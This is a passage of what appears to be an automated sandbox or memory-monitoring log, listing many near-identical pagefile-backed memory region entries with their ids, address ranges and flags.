"pagefile_0x00000000064e0000" filename = "" Region: id = 4455 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4456 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4457 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4458 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4459 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4460 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4461 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4462 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4463 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4464 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4465 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4466 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4467 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4468 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4469 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4470 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4471 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4472 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4473 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4474 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4475 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4476 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4477 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4478 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4479 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4480 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4481 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4482 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4483 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4484 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4485 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4486 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4487 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4488 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4489 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4490 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4491 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4492 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4493 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4494 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4495 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4496 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4497 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4498 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4499 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4500 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4501 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4502 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4503 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4504 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4505 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4506 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4507 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4508 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4509 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4510 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4511 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4512 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4513 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4514 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4515 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4516 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4517 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4518 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4519 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4520 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4521 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4522 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4523 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4524 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4525 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4526 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4527 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4528 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4529 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4530 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4531 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4532 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4533 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4534 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4535 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4536 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4537 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4538 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4539 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4540 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4541 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4542 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4543 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4544 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4545 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4546 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4547 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4548 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4549 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4550 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4551 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4552 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4553 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4554 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4555 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4556 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4557 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4558 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4559 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4560 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4561 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4562 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4563 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4564 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4565 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4566 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4567 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4568 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4569 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4570 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4571 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4572 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4573 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4574 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4575 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4576 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4577 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4578 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4579 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4580 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4581 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4582 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4583 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4584 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4585 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4586 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4587 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4588 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4589 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4590 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4591 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4592 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4593 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4594 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4595 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4596 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4597 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4598 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4599 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4600 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4601 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4602 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4603 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4604 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4605 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4606 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4607 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4608 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4609 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4610 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4611 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4612 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4613 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4614 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4615 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4616 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4617 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4618 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4619 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4620 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4621 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4622 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4623 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4624 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4625 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4626 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4627 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4628 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4629 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4630 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4631 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4632 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4633 start_va = 0x64e0000 end_va = 